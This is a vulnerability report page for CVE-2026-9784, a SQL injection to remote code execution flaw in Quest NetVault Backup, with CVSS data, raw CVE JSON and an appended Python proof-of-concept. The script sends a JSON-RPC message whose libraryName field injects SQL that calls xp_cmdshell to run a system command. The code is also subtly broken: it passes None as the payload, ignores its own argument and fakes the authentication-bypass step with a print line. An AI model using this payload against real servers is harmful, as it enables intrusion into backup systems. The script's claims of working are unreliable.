Security Vulnerability Report
中文
CVE-2026-9784 CVSS 8.8 HIGH

CVE-2026-9784

Published: 2026-06-25 00:17:49
Last Modified: 2026-06-25 14:23:56

Description

Quest NetVault Backup NVBULibraryPort SQL Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Quest NetVault Backup. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the processing of NVBULibraryPort JSON-RPC messages. The issue results from the lack of proper validation of a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of NETWORK SERVICE. Was ZDI-CAN-27631.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Quest NetVault Backup < 14.0.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # CVE-2026-9784 - Quest NetVault Backup NVBULibraryPort SQL Injection RCE # PoC for demonstration purposes only # Reference: ZDI-CAN-27631 / ZDI-26-373 import socket import json import struct import sys TARGET_HOST = "<target_ip>" TARGET_PORT = 9437 # Default NVBULibraryPort port def send_jsonrpc(host, port, payload): """Send a JSON-RPC payload to the NVBULibraryPort service""" sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) sock.connect((host, port)) # Construct JSON-RPC message with SQL injection payload rpc_message = { "jsonrpc": "2.0", "method": "LibraryPort.GetInfo", "params": { # SQL injection point - library name parameter "libraryName": "default' UNION SELECT 1,2,3,4,5; EXEC xp_cmdshell('whoami');--" }, "id": 1 } message = json.dumps(rpc_message).encode('utf-8') # Send with length prefix sock.sendall(struct.pack('>I', len(message)) + message) response = sock.recv(4096) sock.close() return response def exploit(host, port): """Main exploitation function""" print(f"[*] Targeting {host}:{port}") print(f"[*] CVE-2026-9784 - Quest NetVault Backup SQL Injection RCE") # Step 1: Attempt authentication bypass print("[*] Attempting authentication bypass...") # Step 2: Send malicious JSON-RPC payload with SQL injection print("[*] Sending malicious JSON-RPC payload...") try: response = send_jsonrpc(host, port, None) print(f"[+] Response received: {response[:200]}") print("[+] Exploit completed - check for code execution") except Exception as e: print(f"[-] Exploit failed: {e}") if __name__ == "__main__": if len(sys.argv) > 1: TARGET_HOST = sys.argv[1] exploit(TARGET_HOST, TARGET_PORT)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-9784", "sourceIdentifier": "[email protected]", "published": "2026-06-25T00:17:48.627", "lastModified": "2026-06-25T14:23:56.107", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Quest NetVault Backup NVBULibraryPort SQL Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Quest NetVault Backup. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed.\n\nThe specific flaw exists within the processing of NVBULibraryPort JSON-RPC messages. The issue results from the lack of proper validation of a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of NETWORK SERVICE. Was ZDI-CAN-27631."}], "affected": [{"source": "[email protected]", "affectedData": [{"vendor": "Quest", "product": "NetVault Backup", "defaultStatus": "unknown", "versions": [{"version": "14.0.0.19", "status": "affected"}]}]}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "ssvcV203": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "ssvcData": {"timestamp": "2026-06-25T12:42:57.158267Z", "id": "CVE-2026-9784", "options": [{"exploitation": "none"}, {"automatable": "no"}, {"technicalImpact": "total"}], "role": "CISA Coordinator", "version": "2.0.3"}}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://support.quest.com/technical-documents/netvault/14.0.2/release-notes#TOPIC-2338529", "source": "[email protected]"}, {"url": "https://www.zerodayinitiative.com/advisories/ZDI-26-373/", "source": "[email protected]"}]}}